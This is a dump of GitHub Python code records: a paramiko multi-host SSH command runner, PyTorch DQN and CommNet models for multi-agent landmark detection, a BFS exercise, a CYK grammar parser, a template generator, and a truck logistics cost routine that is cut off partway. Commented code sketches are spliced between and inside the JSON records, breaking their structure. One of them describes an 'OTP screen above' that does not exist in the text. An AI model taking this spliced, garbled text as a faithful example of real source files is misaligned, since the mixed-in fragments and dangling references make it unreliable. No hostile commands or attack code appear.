hostnames):\n for hostname in hostnames:\n try:\n self.setup_connection_to_host(hostname)\n except paramiko.AuthenticationException as err:\n logging.warning(f'{hostname} ssh authentication failed with err {err}')\n except paramiko.SSHException as err:\n logging.warning(f'{hostname} ssh setup failed with err {err}')\n except Exception as err:\n logging.error(f'{hostname} exec failed with err {err}')\n\n def exec_on_all_machines(self, hostnames, command):\n res = {}\n for hostname in hostnames:\n res[hostname] = self.exec_on_machine(hostname, command)\n return res\n\n def exec_on_machine(self, hostname, command):\n if hostname not in self.ssh_conns:\n try:\n self.setup_connection_to_host(hostname)\n except paramiko.AuthenticationException as err:\n logging.warning(f'{hostname} ssh authentication failed with err {err}')\n return None, False\n except paramiko.SSHException as err:\n logging.warning(f'{hostname} ssh setup failed with err {err}')\n return None, False\n except Exception as err:\n logging.error(f'{hostname} exec failed with err {err}')\n return None, False\n\n client = self.ssh_conns[hostname]\n _, stdout, stderr = client.exec_command(command)\n return SSHOutput(stdout, stderr), True\n\n\nclass SSHOutput:\n def __init__(self, stdout, stderr):\n self.stdout = stdout\n self.stderr = 
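# The OTP screen above follows Kivy's non-blocking UrlRequest pattern: fire
# the request, return immediately, and let the callbacks update the UI on the
# main thread. A stripped-down sketch (URL and payload are hypothetical):
import json
from kivy.network.urlrequest import UrlRequest

def send_otp(otp):
    UrlRequest(
        'https://example.com/email_otp/',
        req_body=json.dumps({'otp': otp}),
        req_headers={'Content-type': 'application/json'},
        on_success=lambda req, result: print('ok:', result),
        on_failure=lambda req, result: print('failed:', result),
    )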
stderr\n","repo_name":"moziliar/deployment-and-monitoring","sub_path":"bot/src/monitor/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72650315449","text":"import torch\nimport torch.nn as nn\n\n\nclass Network2D(nn.Module):\n\n def __init__(self, agents, frame_history, number_actions):\n super(Network2D, self).__init__()\n self.agents = agents\n self.frame_history = frame_history\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.conv0 = nn.Conv3d(\n in_channels=frame_history,\n out_channels=32,\n kernel_size=(5, 5, 5)).to(\n self.device)\n self.maxpool0 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu0 = nn.PReLU().to(self.device)\n self.conv1 = nn.Conv3d(\n in_channels=32,\n out_channels=32,\n kernel_size=(5, 5, 5)).to(\n self.device)\n self.maxpool1 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu1 = nn.PReLU().to(self.device)\n self.conv2 = nn.Conv3d(\n in_channels=32,\n out_channels=64,\n kernel_size=(4, 4, 4)).to(\n self.device)\n self.maxpool2 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu2 = nn.PReLU().to(self.device)\n self.conv3 = nn.Conv3d(\n in_channels=64,\n out_channels=64,\n kernel_size=(3, 3, 3)).to(\n self.device)\n self.prelu3 = nn.PReLU().to(self.device)\n\n self.fc1 = nn.Linear(in_features=512, out_features=256).to(self.device)\n self.prelu4 = nn.LeakyReLU().to(self.device)\n self.fc2 = nn.Linear(in_features=256, out_features=128).to(self.device)\n self.prelu5 = nn.LeakyReLU().to(self.device)\n self.fc3 = nn.Linear(\n in_features=128,\n out_features=number_actions).to(\n self.device)\n\n def forward(self, input):\n \"\"\"\n Input is a tensor of size\n (batch_size, agents, frame_history, *image_size)\n \"\"\"\n input = input.to(self.device) / 255.0\n\n # Shared layers\n x = input.squeeze(1) # input[:, 0]\n x = self.conv0(x)\n x = self.prelu0(x)\n x = self.maxpool0(x)\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.maxpool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.maxpool2(x)\n x = x.view(-1, 512)\n\n # Individual layers\n x = self.fc1(x)\n x = self.prelu4(x)\n x = self.fc2(x)\n x = self.prelu5(x)\n x = self.fc3(x)\n output = x.unsqueeze(1)\n return output.cpu()\n\n\nclass Network3D(nn.Module):\n\n def __init__(self, agents, frame_history, number_actions, xavier=True):\n super(Network3D, self).__init__()\n\n self.agents = agents\n self.frame_history = frame_history\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.conv0 = nn.Conv3d(\n in_channels=frame_history,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool0 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu0 = nn.PReLU().to(self.device)\n self.conv1 = nn.Conv3d(\n in_channels=32,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool1 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu1 = nn.PReLU().to(self.device)\n self.conv2 = nn.Conv3d(\n in_channels=32,\n out_channels=64,\n kernel_size=(4, 4, 4),\n padding=1).to(\n self.device)\n self.maxpool2 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu2 = nn.PReLU().to(self.device)\n self.conv3 = nn.Conv3d(\n in_channels=64,\n out_channels=64,\n kernel_size=(3, 3, 3),\n padding=0).to(\n self.device)\n self.prelu3 = nn.PReLU().to(self.device)\n\n self.fc1 = 
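# A condensed sketch of the connection-caching idea above: keep one SSHClient
# per host in a dict and reuse it for later commands. The hostname, username
# and key path are placeholders.
import paramiko

clients = {}

def run(hostname, command, username, key_path):
    if hostname not in clients:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.WarningPolicy())
        client.connect(hostname=hostname, username=username,
                       pkey=paramiko.RSAKey.from_private_key_file(key_path))
        clients[hostname] = client
    _, stdout, stderr = clients[hostname].exec_command(command)
    return stdout.read().decode(), stderr.read().decode()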
nn.ModuleList(\n [nn.Linear(in_features=512, out_features=256).to(\n self.device) for _ in range(self.agents)])\n self.prelu4 = nn.ModuleList(\n [nn.PReLU().to(self.device) for _ in range(self.agents)])\n self.fc2 = nn.ModuleList(\n [nn.Linear(in_features=256, out_features=128).to(\n self.device) for _ in range(self.agents)])\n self.prelu5 = nn.ModuleList(\n [nn.PReLU().to(self.device) for _ in range(self.agents)])\n self.fc3 = nn.ModuleList(\n [nn.Linear(in_features=128, out_features=number_actions).to(\n self.device) for _ in range(self.agents)])\n\n if xavier:\n for module in self.modules():\n if type(module) in [nn.Conv3d, nn.Linear]:\n torch.nn.init.xavier_uniform(module.weight)\n\n def forward(self, input):\n \"\"\"\n Input is a tensor of size\n (batch_size, agents, frame_history, *image_size)\n Output is a tensor of size\n (batch_size, agents, number_actions)\n \"\"\"\n input = input.to(self.device) / 255.0\n output = []\n for i in range(self.agents):\n # Shared layers\n x = input[:, i]\n x = self.conv0(x)\n x = self.prelu0(x)\n x = self.maxpool0(x)\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.maxpool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.maxpool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.view(-1, 512)\n # Individual layers\n x = self.fc1[i](x)\n x = self.prelu4[i](x)\n x = self.fc2[i](x)\n x = self.prelu5[i](x)\n x = self.fc3[i](x)\n output.append(x)\n output = torch.stack(output, dim=1)\n return output.cpu()\n\n\nclass CommNet(nn.Module):\n\n def __init__(self, agents, frame_history, number_actions, xavier=True):\n super(CommNet, self).__init__()\n\n self.agents = agents\n self.frame_history = frame_history\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.conv0 = nn.Conv3d(\n in_channels=frame_history,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool0 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu0 = nn.PReLU().to(self.device)\n self.conv1 = nn.Conv3d(\n in_channels=32,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool1 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu1 = nn.PReLU().to(self.device)\n self.conv2 = nn.Conv3d(\n in_channels=32,\n out_channels=64,\n kernel_size=(4, 4, 4),\n padding=1).to(\n self.device)\n self.maxpool2 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu2 = nn.PReLU().to(self.device)\n self.conv3 = nn.Conv3d(\n in_channels=64,\n out_channels=64,\n kernel_size=(3, 3, 3),\n padding=0).to(\n self.device)\n self.prelu3 = nn.PReLU().to(self.device)\n\n self.fc1 = nn.ModuleList(\n [nn.Linear(\n in_features=512 * 2,\n out_features=256).to(\n self.device) for _ in range(\n self.agents)])\n self.prelu4 = nn.PReLU().to(self.device)\n self.fc2 = nn.ModuleList(\n [nn.Linear(\n in_features=256 * 2,\n out_features=128).to(\n self.device) for _ in range(\n self.agents)])\n self.prelu5 = nn.PReLU().to(self.device)\n self.fc3 = nn.ModuleList(\n [nn.Linear(\n in_features=128 * 2,\n out_features=number_actions).to(\n self.device) for _ in range(\n self.agents)])\n\n if xavier:\n for module in self.modules():\n if type(module) in [nn.Conv3d, nn.Linear]:\n torch.nn.init.xavier_uniform(module.weight)\n\n def forward(self, input):\n \"\"\"\n # Input is a tensor of size\n (batch_size, agents, frame_history, *image_size)\n # Output is a tensor of size\n (batch_size, agents, number_actions)\n \"\"\"\n input1 = input.to(self.device) / 255.0\n\n # Shared layers\n input2 
= []\n for i in range(self.agents):\n x = input1[:, i]\n x = self.conv0(x)\n x = self.prelu0(x)\n x = self.maxpool0(x)\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.maxpool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.maxpool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.view(-1, 512)\n input2.append(x)\n input2 = torch.stack(input2, dim=1)\n\n # Communication layers\n comm = torch.mean(input2, axis=1)\n input3 = []\n for i in range(self.agents):\n x = input2[:, i]\n x = self.fc1[i](torch.cat((x, comm), axis=-1))\n input3.append(x)\n input3 = torch.stack(input3, dim=1)\n input3 = self.prelu4(input3)\n\n comm = torch.mean(input3, axis=1)\n input4 = []\n for i in range(self.agents):\n x = input3[:, i]\n x = self.fc2[i](torch.cat((x, comm), axis=-1))\n input4.append(x)\n input4 = torch.stack(input4, dim=1)\n input4 = self.prelu5(input4)\n\n comm = torch.mean(input4, axis=1)\n output = []\n for i in range(self.agents):\n x = input4[:, i]\n x = self.fc3[i](torch.cat((x, comm), axis=-1))\n output.append(x)\n output = torch.stack(output, dim=1)\n\n return output.cpu()\n\n\nclass DQN:\n # The class initialisation function.\n def __init__(\n self,\n agents,\n frame_history,\n logger,\n number_actions=6,\n type=\"Network3d\"):\n self.agents = agents\n self.number_actions = number_actions\n self.frame_history = frame_history\n self.logger = logger\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.logger.log(f\"Using {self.device}\")\n # Create a Q-network, which predicts the q-value for a particular state\n if type == \"Network3d\":\n self.q_network = Network3D(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n self.target_network = Network3D(\n agents, frame_history, number_actions).to(\n self.device)\n elif type == \"CommNet\":\n self.q_network = CommNet(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n self.target_network = CommNet(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n elif type == \"Network2d\":\n self.q_network = Network2D(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n self.target_network = Network2D(\n agents, frame_history, number_actions).to(\n self.device)\n self.copy_to_target_network()\n # Freezes target network\n self.target_network.train(False)\n for p in self.target_network.parameters():\n p.requires_grad = False\n # Define the optimiser which is used when updating the Q-network. The\n # learning rate determines how big each gradient step is during\n # backpropagation.\n self.optimiser = torch.optim.Adam(self.q_network.parameters(), lr=1e-3)\n self.scheduler = torch.optim.lr_scheduler.StepLR(\n self.optimiser, step_size=50, gamma=0.5)\n\n def copy_to_target_network(self):\n self.target_network.load_state_dict(self.q_network.state_dict())\n\n def save_model(self, name=\"dqn.pt\", forced=False):\n self.logger.save_model(self.q_network.state_dict(), name, forced)\n\n # Function that is called whenever we want to train the Q-network. Each\n # call to this function takes in a transition tuple containing the data we\n # use to update the Q-network.\n def train_q_network(self, transitions, discount_factor):\n # Set all the gradients stored in the optimiser to zero.\n self.optimiser.zero_grad()\n # Calculate the loss for this transition.\n loss = self._calculate_loss(transitions, discount_factor)\n # Compute the gradients based on this loss, i.e. 
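# CommNet's communication step above is: mean-pool every agent's hidden state
# into one shared message, concatenate that message back onto each agent's own
# state, and apply that agent's linear layer. A minimal sketch of one step:
import torch
import torch.nn as nn

agents, batch, hidden = 3, 4, 8
fc = nn.ModuleList([nn.Linear(hidden * 2, hidden) for _ in range(agents)])

h = torch.randn(batch, agents, hidden)
comm = h.mean(dim=1)  # (batch, hidden) shared message
out = torch.stack([fc[i](torch.cat((h[:, i], comm), dim=-1))
                   for i in range(agents)], dim=1)
print(out.shape)  # torch.Size([4, 3, 8])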
the gradients of the\n # loss with respect to the Q-network parameters.\n loss.backward()\n # Take one gradient step to update the Q-network.\n self.optimiser.step()\n return loss.item()\n\n def _calculate_loss_tf(self, transitions, discount_factor):\n import tensorflow as tf\n curr_state = transitions[0]\n self.predict_value = tf.convert_to_tensor(\n self.q_network.forward(\n torch.tensor(curr_state)).view(\n -1,\n self.number_actions).detach().numpy(),\n dtype=tf.float32) # Only works for 1 agent\n reward = tf.squeeze(\n tf.clip_by_value(\n tf.convert_to_tensor(\n transitions[2], dtype=tf.float32), -1, 1), [1])\n next_state = transitions[3]\n action_onehot = tf.squeeze(tf.one_hot(\n transitions[1], 6, 1.0, 0.0), [1])\n\n pred_action_value = tf.reduce_sum(\n self.predict_value * action_onehot, 1) # N,\n # max_pred_reward = tf.reduce_mean(tf.reduce_max(\n # self.predict_value, 1), name='predict_reward')\n with tf.variable_scope('target'):\n targetQ_predict_value = tf.convert_to_tensor(\n self.q_network.forward(torch.tensor(\n next_state)).view(-1, self.number_actions)\n .detach().numpy(),\n dtype=tf.float32) # NxA\n\n best_v = tf.reduce_max(targetQ_predict_value, 1) # N,\n target = reward + discount_factor * tf.stop_gradient(best_v)\n\n cost = tf.losses.huber_loss(target, pred_action_value,\n reduction=tf.losses.Reduction.MEAN)\n with tf.Session() as _:\n print(\"cost\", cost.eval())\n\n # Function to calculate the loss for a particular transition.\n def _calculate_loss(self, transitions, discount_factor):\n '''\n Transitions are tuple of shape\n (states, actions, rewards, next_states, dones)\n '''\n curr_state = torch.tensor(transitions[0])\n next_state = torch.tensor(transitions[3])\n terminal = torch.tensor(transitions[4]).type(torch.int)\n\n rewards = torch.clamp(\n torch.tensor(\n transitions[2], dtype=torch.float32), -1, 1)\n\n y = self.target_network.forward(next_state)\n # dim (batch_size, agents, number_actions)\n y = y.view(-1, self.agents, self.number_actions)\n # Get the maximum prediction for the next state from the target network\n max_target_net = y.max(-1)[0]\n # dim (batch_size, agents, number_actions)\n network_prediction = self.q_network.forward(curr_state).view(\n -1, self.agents, self.number_actions)\n isNotOver = (torch.ones(*terminal.shape) - terminal)\n # Bellman equation\n batch_labels_tensor = rewards + isNotOver * \\\n (discount_factor * max_target_net.detach())\n\n # td_errors = (network_prediction -\n # batch_labels_tensor.unsqueeze(-1)).detach() # TODO td error needed\n # for exp replay\n\n actions = torch.tensor(transitions[1], dtype=torch.long).unsqueeze(-1)\n y_pred = torch.gather(network_prediction, -1, actions).squeeze()\n\n # Update transitions' weights\n # self.buffer.recompute_weights(transitions, td_errors)\n\n return torch.nn.SmoothL1Loss()(\n batch_labels_tensor.flatten(), y_pred.flatten())\n","repo_name":"amiralansary/rl-medical","sub_path":"examples/LandmarkDetection/MultiAgent/DQNModel.py","file_name":"DQNModel.py","file_ext":"py","file_size_in_byte":16429,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"77"} +{"seq_id":"74211836088","text":"from collections import deque\nimport sys\n\nt = int(sys.stdin.readline())\n\ndef bfs(start, count):\n que = deque([start])\n visited[start] = True\n\n while que:\n if visited.count(True) == n:\n return count\n num = que.popleft()\n\n for i in graph[num]:\n if not visited[i]:\n que.append(i)\n count +=1\n visited[i] = True\n\nfor _ in range(t):\n n,m = map(int, 
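# The core of _calculate_loss() above, isolated: build the Bellman target from
# the frozen target network, then gather the predicted Q-values of the actions
# actually taken. Shapes and the discount factor here are illustrative.
import torch

batch, n_actions, gamma = 4, 6, 0.9
q_pred = torch.randn(batch, n_actions)  # q_network(curr_state)
q_next = torch.randn(batch, n_actions)  # target_network(next_state)
rewards = torch.zeros(batch)
not_done = torch.ones(batch)

target = rewards + not_done * gamma * q_next.max(-1)[0].detach()
actions = torch.randint(0, n_actions, (batch, 1))
taken = q_pred.gather(-1, actions).squeeze(-1)  # Q(s, a) for the taken actions
loss = torch.nn.SmoothL1Loss()(taken, target)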
sys.stdin.readline().rstrip().split())\n visited = [False] * (n+1)\n\n graph = [[] for _ in range(n+1)]\n\n for i in range(m):\n a,b = map(int, sys.stdin.readline().rstrip().split())\n graph[a].append(b)\n graph[b].append(a)\n\n p = bfs(1, 0)\n print(p)\n\n","repo_name":"hyunha95/algorithm-study","sub_path":"CSH/python/baekjoon/dfs&bfs/P9372_상근이의_여행.py","file_name":"P9372_상근이의_여행.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34000633569","text":"# =================== >>\r\n# PARSER\r\n# =================== >>\r\nimport itertools, sys\r\nfrom pycomp.lexer import run_lexer\r\nfrom pycomp.error import get_error\r\nfrom pycomp.cfg2cnf import grammar_to_list\r\nfrom pycomp.utils import stringify_line\r\n\r\ndef subs_grammar(union, production, grammar_list):\r\n '''\r\n I.S. union is defined, but maybe empty\r\n F.S. if rule is in list of grammar, and the rule is not in union, \r\n we add the rule to it.\r\n \r\n For instance, we have production (B, A) and there is a rule such that\r\n S -> BA and C -> BA in the form of ['S', 'B', 'A'] and ['C', 'B', 'A'].\r\n Furthermore, let us assume our union is empty, then \r\n from union = [] -> union = ['S', 'C'] because they produce BA. \r\n '''\r\n for grammar in grammar_list:\r\n if (grammar[0] not in union) and (production == tuple(grammar[1:])):\r\n union.append(grammar[0])\r\n\r\nclass Parser:\r\n def __init__(self, filename, cnf_file, text):\r\n self.filename = filename\r\n self.cnf_file = cnf_file\r\n self.text = text\r\n\r\n def parse_cyk(self, tokenized_line, cnf_grammar):\r\n line = [\"'\" + token.tag + \"'\" for token in tokenized_line]\r\n length = len(line)\r\n cyk_table = [[[] for _ in range(length)] for _ in range(length)]\r\n\r\n for i in range(length):\r\n for j in range(length - i):\r\n if (i == 0):\r\n for grammar in cnf_grammar:\r\n if (len(grammar) == 2) and (grammar[1] == line[j]):\r\n cyk_table[i][j].append(grammar[0])\r\n else:\r\n lprod = []\r\n x = 0; y = j + 1\r\n while (x != i):\r\n cartesian_prod = list(itertools.product(cyk_table[x][j], \r\n cyk_table[i - x - 1][y]))\r\n lprod.extend(cartesian_prod)\r\n x += 1; y += 1\r\n \r\n union = []\r\n for production in lprod:\r\n subs_grammar(union, production, cnf_grammar)\r\n cyk_table[i][j] = [var for var in set(union)]\r\n\r\n return (cyk_table[-1][0] != [])\r\n\r\n def parse_text(self):\r\n text_by_line, tokenized_lines = run_lexer(self.filename, self.text)\r\n cnf_grammar = grammar_to_list(self.cnf_file)\r\n\r\n if_count = 0\r\n ctr = 0\r\n for line in tokenized_lines:\r\n is_accepted = self.parse_cyk(line, cnf_grammar)\r\n line_stringified = stringify_line(line)\r\n \r\n # Handle if block\r\n if is_accepted:\r\n if 'IF' in line_stringified:\r\n if_count += 1\r\n elif ('ELSE' in line_stringified) and (if_count != 0):\r\n if_count -= 1\r\n elif ('ELIF' in line_stringified) and (if_count == 0):\r\n error = get_error('ELIF', line, f\"Expected an if statement\", text_by_line)\r\n error.print_error()\r\n sys.exit(1)\r\n elif ('ELSE' in line_stringified) and (if_count == 0):\r\n error = get_error('ELSE', line, f\"Expected an if statement\", text_by_line)\r\n error.print_error()\r\n sys.exit(1)\r\n else:\r\n initial_token = line[0]\r\n print(initial_token.pos_start)\r\n print(text_by_line[initial_token.pos_start.line - 1])\r\n print(\"\\033[91mSyntax Error Found!\\033[0m\")\r\n sys.exit(1)\r\n\r\n ctr += 1\r\n\r\ndef run_parser(filename, cnf_file, text):\r\n parser = 
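# A compact restatement of the CYK recurrence implemented in parse_cyk()
# above, for a CNF grammar given as lists like ['S', 'A', 'B'] (S -> A B) or
# ['A', "'a'"] (A -> terminal). The toy grammar below is an assumption.
import itertools

def cyk_accepts(tokens, grammar, start='S'):
    n = len(tokens)
    table = [[set() for _ in range(n)] for _ in range(n)]
    for j, tok in enumerate(tokens):
        table[0][j] = {g[0] for g in grammar if len(g) == 2 and g[1] == tok}
    for i in range(1, n):          # span length - 1
        for j in range(n - i):     # span start
            for s in range(i):     # split point
                for a, b in itertools.product(table[s][j], table[i - s - 1][j + s + 1]):
                    table[i][j] |= {g[0] for g in grammar if tuple(g[1:]) == (a, b)}
    return start in table[n - 1][0]

g = [['S', 'A', 'B'], ['A', "'a'"], ['B', "'b'"]]
print(cyk_accepts(["'a'", "'b'"], g))  # True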
Parser(filename, cnf_file, text)\r\n parser.parse_text()\r\n print(\"\\033[92mYay, your program is accepted!\\033[0m\")\r\n","repo_name":"khelli07/python-compiler","sub_path":"pycomp/cyk_parser.py","file_name":"cyk_parser.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26980389929","text":"import argparse\nimport os\nimport string\nimport shutil\nimport urllib.request\n\n\ndef parse_args(destination, name, type):\n print(\"destination:\", destination)\n print(\"name:\", name)\n print(\"type:\", type)\n\n\nparser = argparse.ArgumentParser(description=\"Used to generate various template files.\")\nparser.add_argument(\"-n\", \"--name\", help=\"target project name. eg: EPDomain_okr\", required=True)\nparser.add_argument(\"-t\", \"--type\", help=\"target project type\", choices=[\"domain\", \"app\", \"plugin\"], required=True)\nparser.add_argument(\"-d\", \"--destination\", help=\"target generated path\", default=r'..\\template_generate')\nargs = parser.parse_args()\n\n\ndef download_gitignore():\n url = \"https://www.toptal.com/developers/gitignore/api/c++,qt,qml\"\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/110.0.0.0 Safari/537.36',\n }\n\n request = urllib.request.Request(url, headers=headers)\n gitignore_text = urllib.request.urlopen(request).read()\n\n try:\n gitignore_file_path = os.path.join(args.destination, args.name, '.gitignore')\n with open(gitignore_file_path, 'w', encoding='utf-8') as gitignore_file:\n gitignore_file.write(gitignore_text.decode())\n gitignore_file.close()\n except IOError:\n shutil.rmtree(args.destination)\n exit(1)\n\n\nif __name__ == '__main__':\n try:\n parse_args(args.destination, args.name, args.type)\n except Exception as e:\n print(e)\n\n template_files_path = r'template\\{type}'.format(type=args.type)\n path_walk = os.walk(template_files_path)\n files = []\n for dirpath, dirnames, filenames in path_walk:\n for filename in filenames:\n filename = dirpath + '\\\\' + filename\n files.append(filename)\n\n for file in files:\n with open(file, 'r') as f:\n template = string.Template(f.read())\n f.close()\n\n file = file.replace(template_files_path, '')\n target_file_path = args.destination + '\\\\' + args.name + '\\\\' + file\n target_file_path_dirname = os.path.dirname(target_file_path)\n if not os.path.exists(target_file_path_dirname):\n os.makedirs(target_file_path_dirname)\n\n with open(os.path.realpath(target_file_path), 'x', encoding='utf-8') as f:\n f.write(template.safe_substitute(TM_TARGET_NAME=args.name))\n f.close()\n\n download_gitignore()\n","repo_name":"BitYhb/qsdf_core_master","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1336412918","text":"import math\ndef makeItOne(N):\n # code here \n #print(int(N))\n count = 0\n l = [int(math.pow(2,x)) for x in range(int(math.log2(N)+1))]\n #print(l)\n\n while(N!=1):\n \tif N in l:\n \t\tcount+=l.index(N)\n \t\tN = 1\n \telse:\n \t\t#l = [x for x in l if x= flow) and (initial_truck_list[n][3] <= temp_cap) and (initial_truck_list[n][0] + initial_truck_list[n][1] + initial_truck_list[n][2] <= temp_truck_num)): #若该车辆组合装载量大于等于运量,且该组合装载量小于等于当前装载量,且该组合车辆数小于等于当前车辆数\n temp_cap = initial_truck_list[n][3]\n #更新当前装载量为该组合装载量\n temp_truck_num = initial_truck_list[n][0] + 
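# The logistics routines that follow brute-force, for each load, the truck mix
# with the smallest sufficient capacity (fewer trucks as the tie-break). The
# same search, condensed with itertools.product; the capacities and limits
# here are illustrative stand-ins for that module's GL_* parameters.
import itertools

def best_combo(load, caps=(40, 20, 12), max_each=5):
    best = None
    for combo in itertools.product(range(max_each + 1), repeat=len(caps)):
        cap = sum(n * c for n, c in zip(combo, caps))
        if cap >= load and (best is None or (cap, sum(combo)) < best[:2]):
            best = (cap, sum(combo), combo)
    return best

print(best_combo(55))  # (56, 4, (0, 1, 3)): one 20t truck and three 12t trucks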
initial_truck_list[n][1] + initial_truck_list[n][2] #更新当前车辆数为该组合车辆数\n final_truck = initial_truck_list[n]\n #更新车辆使用为该组合\n\n return final_truck\n\n# 得出初始的输出表格\ndef link_route(hub_list):\n '''\n \n :param hub_list: 中心局清单\n :return: 车辆成本空表,包含列'收寄城市', '寄达城市', '车辆使用情况', '车辆成本'(只添加前两列)\n '''\n hub_list = list(hub_list['城市名称'])\n\n cost_detail = pd.DataFrame()\n for i in range(0, len(hub_list)):\n for j in range(0, len(hub_list)):\n start = hub_list[i]\n end = hub_list[j]\n truck = np.nan\n cost = 0\n cost_detail = cost_detail.append([[start, end, truck, cost]])\n cost_detail = pd.DataFrame(np.array(cost_detail), columns=['收寄城市', '寄达城市', '车辆使用情况', '车辆成本'])\n return cost_detail\n\n#尾量空载情况运输成本计算公式\ndef transport_1(final_truck_list,temp_distance,driver_num):\n '''\n \n :param final_truck_list: 车辆使用情况(满载,空载两个list)\n :param temp_distance: 路线之间的距离\n :param driver_num: 司机数\n :return: 单条线路运输成本\n '''\n # 计算成本\n truck_cost = temp_distance * ((final_truck_list[0][0] + final_truck_list[1][0]) * (pa.GL_DEP[2] + pa.GL_LQ[2] + pa.GL_OTHER[2]) + (final_truck_list[0][1] + final_truck_list[1][1]) * (pa.GL_DEP[1] + pa.GL_LQ[1] + pa.GL_OTHER[1])+ (final_truck_list[0][2] + final_truck_list[1][2]) * (pa.GL_DEP[0] + pa.GL_LQ[0] + pa.GL_OTHER[0])) + \\\n temp_distance * (final_truck_list[0][0] * pa.GL_OIL[2] + final_truck_list[0][1] * pa.GL_OIL[1] + final_truck_list[0][2] * pa.GL_OIL[0]) + \\\n temp_distance * (final_truck_list[1][0] * pa.GL_EMP_OIL[2] + final_truck_list[1][1] * pa.GL_EMP_OIL[1] +final_truck_list[1][2] * pa.GL_EMP_OIL[0]) + \\\n (round(temp_distance / pa.GL_V[2], 6) * driver_num * pa.GL_LABOR[2] * (final_truck_list[0][0] + final_truck_list[1][0])) + (round(temp_distance / pa.GL_V[1], 6) * driver_num * pa.GL_LABOR[1] * (final_truck_list[0][1] + final_truck_list[1][1])) + (round(temp_distance / pa.GL_V[0], 6) * driver_num * pa.GL_LABOR[0] * (final_truck_list[0][2] + final_truck_list[1][2]))\n #折旧+路桥+其他费用+\n #满载车油耗费用+\n #空载车油耗费用+\n #司机费用\n\n return truck_cost\n\n\n\n# 计算尾量空载情况车辆成本\ndef transport_cost_1(cost_detail, weight, distance):\n '''\n \n :param cost_detail: 初始化车辆成本表\n :param weight: 运量(重量)表\n :param distance: 距离表\n :return: 最终成本表(尾量空载)\n '''\n initial_truck_list = truck_list(pa.GL_MAX) #计算车辆组合清单\n\n for i in range(0, cost_detail.shape[0]): #循环初始化表中的每一行\n\n print(\"共{0}层,目前循环到{1}层!\".format(cost_detail.shape[0], i + 1))\n\n route_list = [[cost_detail.loc[i, \"收寄城市\"] , cost_detail.loc[i, \"寄达城市\"]],\n [cost_detail.loc[i, \"寄达城市\"] , cost_detail.loc[i, \"收寄城市\"]]]\n\n # 线路清单 [[起,终],[终,起]]\n flow = [0,0]\n full_truck_list = []\n empty_truck_list = [0, 0, 0, 0]\n\n for j in range(0, len(route_list)):\n\n flow[j] = weight.iloc[weight.loc[(weight['收寄城市'] == route_list[j][0]) & (weight['寄达城市'] == route_list[j][1])].index.tolist()[0], 2]\n # 查询该行起-终和终-起的运量(重量)并赋给flow\n full_truck_list.append(initial_truck(initial_truck_list,flow[j]))\n # 计算起-终和终-起的初始车辆使用情况\n if j == 1: #如果起-终和终-起的初始车辆使用情况均计算完毕\n if full_truck_list[j][3] >= full_truck_list[j - 1][3]:\n #如果起-终使用的车型组合载重更小,则进入下列循环进行车辆更新\n for m in range(0, full_truck_list[j][0] + 1):\n for n in range(0, full_truck_list[j][1] + 1):\n for p in range(0, full_truck_list[j][2] + 1):\n if (m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]) >= flow[j-1]:\n full_truck_list[j - 1] = [m, n, p,m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]]\n empty_truck_list = [full_truck_list[j][i] - full_truck_list[j - 1][i] for i in range(len(full_truck_list[j]))]\n empty_truck_list[3] = empty_truck_list[0] * pa.GL_CAP[2] + empty_truck_list[1] * pa.GL_CAP[1] + 
